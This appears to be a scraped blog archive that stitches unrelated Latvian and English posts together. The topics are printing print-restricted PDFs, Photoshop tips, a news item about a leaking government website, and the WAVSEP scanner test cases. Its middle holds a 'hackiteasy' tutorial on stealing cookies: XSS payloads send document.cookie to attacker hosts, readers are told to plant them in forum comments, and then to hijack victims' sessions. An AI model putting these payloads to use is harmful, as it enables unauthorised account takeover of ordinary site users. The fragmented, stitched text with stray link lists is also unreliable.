I had couple of instances where I wanted to print PDF documents but couldn’t do so since the print option was disabled. Tried many ways, searched in the web but no help until the other day to my surprise I got this tool called GSView.

Using GSView we can print PDF documents even though the printing option is disabled. But to use GSView we also need to install another tool called Ghostscript. You can download these tools from:
Ghostscript

http://pages.cs.wisc.edu/~ghost/doc/AFPL/get851.htm

GSView

http://pages.cs.wisc.edu/~ghost/gsview/get47.htm

How to do use this tool:
• Download and install Ghostscript
• Download, Install and run GSView
• Open the GSView Tool and open the PDF document you can’t print.
• Go to File -> Print as you normally would.
I tried this tool and it worked for me.

Related posts:

1. Kā apskatīt PDF dokumentus izmantojot NOKIA (SYMBIAN)
2. Kā uzinstalēt aplikācijas no OVI store izmantojot PC
3. Kā saglabāt flash (swf) failu izmantojot interneta pārlūku (firefox, IE, utt)

• Open your photo via Photoshop. If you need to, crop your photo using the CROP tool on the left tool bar. This can help remove any unnecessary background that may be in there.
• Once cropped, if you cropped it, click on IMAGE at the top and select ADJUSTMENTS/AUTO LEVELS. Once you have done that, back to adjustments and this time select AUTO CONTRAST. And again, under adjustments, run AUTO COLOR.
• After you’ve got those three down, bring up the curves palette with Ctrl+M. Drag that diagonal line until you get the balance that you like. You can drag it twice.
• Finally, on your main image layer, click the FILTER menu. Open the SHARPEN sub-menu and run UNSHARP MASK. 100%, one to two pixels and two to ten threshold levels will make your images look much sharper.

Related posts:

1. Kā uzinstalēt aplikācijas no OVI store izmantojot PC
2. Vienkārš veids kā saglabāt video, bez papildus programmām
3. Kā ierakstīt stream video?

http://www.apollo.lv/portal/news/articles/262237

Kā pārliecinājās aģentūra LETA, izmantojot minētās mājaslapas tehniskās nepilnības, ikvienam interneta lietotājam bija iespējams iegūt informāciju par dienestā strādājošo ierēdņu algām, kā arī viņu personīgos datus.

Izmantojot būtiskus pārkāpumus mājaslapas drošībā, «ir iespējams iegūt un manipulēt ar pilnīgi visu informāciju, kura atrodas uz servera, ieskaitot pašu serveri», norādīja «Influent».

Drošības testētāji esot informējuši par atrasto «caurumu» arī pašu VPD, bet atbildi no tā neesot sagaidījuši.

Adrese uz visiem publiski pieejamajiem VPD failiem, kas augšupielādēti uz servera, bija gluži vienkārša – «www.probacija.lv/upload».

Tomēr īsi pēc aģentūras LETA ziņas publicēšanas minētais «caurums» tika «aizlāpīts», līdz ar to dati publiskajā vidē vairs nav pieejami.

Vienā no neaizsargātajiem failiem drošības pārkāpumu testētāji esot atraduši dokumentu, kurā redzams, ka par mājaslapas izstrādi no valsts budžeta paprasīti vairāk nekā 1000 lati, lai gan izstrādātājiem samaksāts vien ap 300 latiem.

VPD pārstāvis Imants Mozers aģentūrai LETA sacīja, ka, uzzinot par šo situāciju, dienests sācis to vērtēt. «Tiklīdz būs zināmi notikušā apstākļi un plašāks skaidrojums, arī mēs sniegsim informāciju,» norādīja Mozers, piebilstot, ka pagaidām nav saprotams, kā šāda veida dati varējuši būt pieejami publiskā vidē.

VPD mājaslapa esot izstrādāta 2004.gadā. Arī intranets dienestam izstrādāts sen, bet Mozers nemācēja pateikt konkrētu gadu.

VPD mājaslapa ir izvietota uz SIA «Lattelecom» serveriem.

Mozers piebilda, – viņa rīcībā nav informācijas, ka drošības testētāji iepriekš būtu ziņojuši VPD par atrasto «caurumu» dienesta mājaslapā.

Related posts:

1. Uzlauzta Vienotības mājaslapa
2. Uzlauzta “Mežavairogu” mājaslapa.
3. Drošības caurums CSDD un Parex mājaslapā

Otrs veids ir izmantot šo pieeju.

Savkārt ievietot jau mājaslapā pārsūtāmo informāciju visbiežāk izdevies izmantojot šo piemēru:

<p>script>
new Image().src=”http://jehiah.com/_sandbox/log.cgi?c=”+encodeURI(document.cookie);
<p>/script>

In computer science, session hijacking refers to the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim’s computer (see HTTP cookie theft).

Here we show how you can hack a session using javascript and php.

What is a cookie?

A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser.A cookie is sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back by the browser unchanged everytime it accesses the server.
A cookie has a expiration time that is set by the server and are deleted automatically after the expiration time.
Cookie is used to maintain users authentication and to implement shopping cart during his navigation,possibly across multiple visits.

What can we do after stealing cookie?

Well,as we know web sites authenticate their user’s with a cookie,it can be used to hijack the victims session.The victims stolen cookie can be replaced with our cookie to hijack his session.

This is a cookie stealing script that steals the cookies of a user and store them in a text file, these cookied can later be utilised.

PHP Code:

Save the script as a cookielogger.php on your server.
(You can get any free webhosting easily such as justfree,x10hosting etc..)

Create an empty text file log.txt in the same directory on the webserver. The hijacked/hacked cookies will be automatically stored here.

Now for the hack to work we have to inject this piece of javascript into the target’s page. This can be done by adding a link in the comments page which allows users to add hyperlinks etc. But beware some sites dont allow javascript so you gotta be lucky to try this.

The best way is to look for user interactive sites which contain comments or forums.

Post the following code which invokes or activates the cookielogger on your host.

Code:
<p>script type=”text/javascript” language=”Java script”>// document.location="http://www.yourhost.com/cookielogger.php?cookie=" + document.cookie;
// ]]><p>/script>

Your can also trick the victim into clicking a link that activates javascript.
Below is the code which has to be posted.

Code:
<p>a href=”java script:document.location=’http://www.yourhost.com/cookielogger.php?cookie=’+document.cookie;”>Click here!

Clicking an image also can activate the script.For this purpose you can use the below code.

Code:

<p>img src=”URL OF THE IMAGE” alt=”" />

All the details like cookie,ipaddress,browser of the victim are logged in to log.txt on your hostserver

In the above codes please remove the space in between javascript.

Hijacking the Session:

Now we have cookie,what to do with this..?
Download cookie editor mozilla plugin or you may find other plugins as well.

Go to the target site–>open cookie editor–>Replace the cookie with the stolen cookie of the victim and refresh the page.Thats it!!!you should now be in his account. Download cookie editor mozilla plugin from here : https://addons.mozilla.org/en-US/firefox/addon/573

Don’t forget to comment if you like my post.
by hackiteasy

Related posts:

1. www.zz.lv un XSS
2. Aizstājam vai izmainām izvadāmo kodu izmantojot javascript
3. Lapas redirect

Related posts:

1. Video konvertēšana
2. Kā ierakstīt stream video?
3. Vienkārš veids kā saglabāt video, bez papildus programmām

Related posts:

1. Kā mērīt Linux noslodzi?

Related posts:

1. John F. Kennedy: “We choose to go to the moon” speech
2. Martin Luther King’s speech “I Have A Dream”

Related posts:

1. Iznācis WordPress 3.0.5 ar drošības labojumiem
2. WordPress update crash
3. Atjaunojam wordpress

No related posts.

Tiek testēts izmantojot šādus testus:

Project WAVSEP currently consists of the following test cases:

64 Reflected XSS test cases (32 GET cases, 32 POST cases -> 66 total vulnerabilities)

130 SQL Injection test cases, most of them implemented for MySQL & MSSQL (65 GET cases, 65 POST Vases -> 136 total vulnerabilities)

o The list of test cases includes vulnerable pages that respond with 500 HTTP errors, 200 HTTP Responses with erroneous text, 200 HTTP Responses with differentiation or completely identical 200 HTTP responses.

o 80 out of 136 cases are simple SQL injection test cases (500 & 200 erroneous HTTP responses), and 56 are Blind SQL Injection test cases (valid and identical 200 HTTP responses).

 7 different categories of false positive Reflected XSS vulnerabilities (GET OR POST).

10 different categories of false positive SQL Injection vulnerabilities (GET OR POST)

Projekts tiek hostēts iekš googles un vairāk par to var lasīt izstrādātāja blogā.

Principā ir laiks pārvērtēt izmantotos rīkus.

Kādu laiku atpakaļ pats testēju vairākus atvērtā tipa rīkus izmantojot vienkāršu scenāriju- uzstādīju vairākas vecas wordpress un joomla versijas ar zināmiem ievainojumiem. Diemžēl rezultāts mani apbēdināja, jo bieži rīki nespēja atrast pat dažas ļoti vienkārša XSS ievainojamības.

Related posts:

1. WEB testēšanas rīki
2. www.zz.lv un XSS
3. Banku internetbanku autentifikācijas un autorizācijas drošības salīdzinājums